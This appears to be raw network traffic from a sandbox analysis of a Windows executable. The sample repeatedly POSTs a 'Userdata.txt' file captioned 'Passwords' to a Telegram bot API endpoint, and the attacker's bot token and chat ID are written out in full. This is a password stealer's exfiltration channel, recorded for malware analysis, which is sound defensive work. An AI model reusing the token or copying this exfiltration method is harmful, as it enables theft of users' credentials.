                                                                                                        2025-01-10 18:56:44 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 31 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 33 35 34 30 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":44611,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736535404,"document":{"file_name":"U


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        11192.168.2.949994149.154.167.2204437628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-10 18:56:46 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary================8dd322011935a6c
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 1090
                                                                                                        2025-01-10 18:56:46 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 32 30 31 31 39 33 35 61 36 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: --===============8dd322011935a6cContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                        2025-01-10 18:56:46 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Fri, 10 Jan 2025 18:56:46 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 534
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2025-01-10 18:56:46 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 31 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 33 35 34 30 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":44612,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736535406,"document":{"file_name":"U


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        12192.168.2.949996149.154.167.2204437628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-10 18:56:47 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary================8dd32332070e6db
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 1090
                                                                                                        2025-01-10 18:56:47 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 33 33 32 30 37 30 65 36 64 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: --===============8dd32332070e6dbContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                        2025-01-10 18:56:48 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Fri, 10 Jan 2025 18:56:48 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 534
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2025-01-10 18:56:48 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 31 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 33 35 34 30 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":44613,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736535408,"document":{"file_name":"U


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        13192.168.2.949998149.154.167.2204437628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-10 18:56:49 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary================8dd324620a0f79f
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 1090
                                                                                                        2025-01-10 18:56:49 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 34 36 32 30 61 30 66 37 39 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: --===============8dd324620a0f79fContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                        2025-01-10 18:56:50 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Fri, 10 Jan 2025 18:56:50 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 535
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2025-01-10 18:56:50 UTC535INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 31 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 33 35 34 30 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":44614,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736535409,"document":{"file_name":"U


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        14192.168.2.950000149.154.167.2204437628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-10 18:56:51 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary================8dd32591250daf8
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 1090
                                                                                                        2025-01-10 18:56:51 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 35 39 31 32 35 30 64 61 66 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: --===============8dd32591250daf8Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                        2025-01-10 18:56:52 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Fri, 10 Jan 2025 18:56:51 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 534
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2025-01-10 18:56:52 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 31 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 33 35 34 31 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":44615,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736535411,"document":{"file_name":"U


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        15192.168.2.950002149.154.167.2204437628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-10 18:56:53 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary================8dd326ea7100d5c
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 1090
                                                                                                        2025-01-10 18:56:53 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 36 65 61 37 31 30 30 64 35 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: --===============8dd326ea7100d5cContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                        2025-01-10 18:56:53 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Fri, 10 Jan 2025 18:56:53 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 534
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2025-01-10 18:56:53 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 31 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 33 35 34 31 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":44616,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736535413,"document":{"file_name":"U


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        16192.168.2.950004149.154.167.2204437628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-10 18:56:55 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary================8dd328179a8fd74
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 1090
                                                                                                        2025-01-10 18:56:55 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 38 31 37 39 61 38 66 64 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: --===============8dd328179a8fd74Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                        2025-01-10 18:56:55 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Fri, 10 Jan 2025 18:56:55 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 534
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2025-01-10 18:56:55 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 31 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 33 35 34 31 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":44617,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736535415,"document":{"file_name":"U


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        17192.168.2.950006149.154.167.2204437628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-10 18:56:56 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary================8dd32943d993b6f
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 1090
                                                                                                        2025-01-10 18:56:56 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 39 34 33 64 39 39 33 62 36 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: --===============8dd32943d993b6fContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                        2025-01-10 18:56:57 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Fri, 10 Jan 2025 18:56:56 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 534
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
